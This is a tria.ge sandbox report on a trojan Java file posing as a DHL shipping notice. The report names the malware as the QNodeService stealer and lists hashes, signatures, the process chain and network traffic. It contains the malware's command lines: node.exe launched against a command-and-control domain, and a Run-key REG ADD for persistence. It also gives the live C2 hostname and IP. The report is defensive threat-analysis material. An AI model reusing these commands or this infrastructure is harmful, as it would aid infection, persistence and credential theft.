Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

DHL Notifi...TD.jar

windows7_x64

1

DHL Notifi...TD.jar

windows10_x64

10

Analysis

  • max time kernel
    58s
  • max time network
    128s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    16/10/2020, 10:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DHL Notification DHL_AWB_0011179303 ETD.jar

  • Size

    249KB

  • MD5

    51dc82e81caca8221a80c68aabf06596

  • SHA1

    0e0e7c82b36f7240d7677bf2c12d8750d22e5542

  • SHA256

    c7e2b03baae34026d8993fd56a55511a7d8ec99e784aba042d5e89fd404f7d98

  • SHA512

    cfd75246ad15c7260a373ff6b781e31c599064dbb40ee1c77be5a32deb2c46c80b7b52476c71c31cf205ce4c07697e11a90afe6b26c6d06d87392a1e489b7dde

Score
10/10
trojanqnodeservicepersistencespyware

Malware Config

Signatures

  • QNodeService

    Trojan/stealer written in NodeJS and spread via Java downloader.

    trojanqnodeservice
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • JavaScript code in executable 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\DHL Notification DHL_AWB_0011179303 ETD.jar"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3076
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\6630fbc2.tmp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain severdops.ddns.net
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3400
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2212
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3484
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                7⤵
                • Adds Run key to start application
                PID:3640

Network

  • flag-unknown
    DNS
    nodejs.org
    Remote address:
    8.8.8.8:53
    Request
    nodejs.org
    IN A
    Response
    nodejs.org
    IN A
    104.20.22.46
    nodejs.org
    IN A
    104.20.23.46
  • flag-unknown
    DNS
    severdops.ddns.net
    Remote address:
    8.8.8.8:53
    Request
    severdops.ddns.net
    IN A
    Response
    severdops.ddns.net
    IN A
    18.134.9.244
  • flag-unknown
    DNS
    wtfismyip.com
    Remote address:
    8.8.8.8:53
    Request
    wtfismyip.com
    IN A
    Response
    wtfismyip.com
    IN A
    95.217.228.176
  • 104.20.22.46:443
    nodejs.org
    tls
    javaw.exe
    458.7kB
     29.6MB
     9959
    19828
  • 18.134.9.244:443
    severdops.ddns.net
    tls
    node.exe
    865 B
     3.1kB
     7
    7
  • 18.134.9.244:443
    severdops.ddns.net
    tls
    node.exe
    235.2kB
     13.7MB
     4905
    9160
  • 18.134.9.244:443
    severdops.ddns.net
    tls
    node.exe
    865 B
     3.0kB
     7
    5
  • 18.134.9.244:443
    severdops.ddns.net
    tls
    node.exe
    3.2kB
     3.9kB
     20
    16
  • 95.217.228.176:443
    wtfismyip.com
    tls
    node.exe
    895 B
     3.9kB
     8
    10
  • 8.8.8.8:53
    nodejs.org
    dns
    56 B
     88 B
     1
    1

    DNS Request

    nodejs.org

    DNS Response

    104.20.22.46
    104.20.23.46

  • 8.8.8.8:53
    severdops.ddns.net
    dns
    64 B
     80 B
     1
    1

    DNS Request

    severdops.ddns.net

    DNS Response

    18.134.9.244

  • 8.8.8.8:53
    wtfismyip.com
    dns
    59 B
     75 B
     1
    1

    DNS Request

    wtfismyip.com

    DNS Response

    95.217.228.176

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2212-177-0x000000F7B0080000-0x000000F7B0081000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3400-173-0x000001BC4C840000-0x000001BC4C841000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3776-170-0x000003BD857C0000-0x000003BD857C1000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.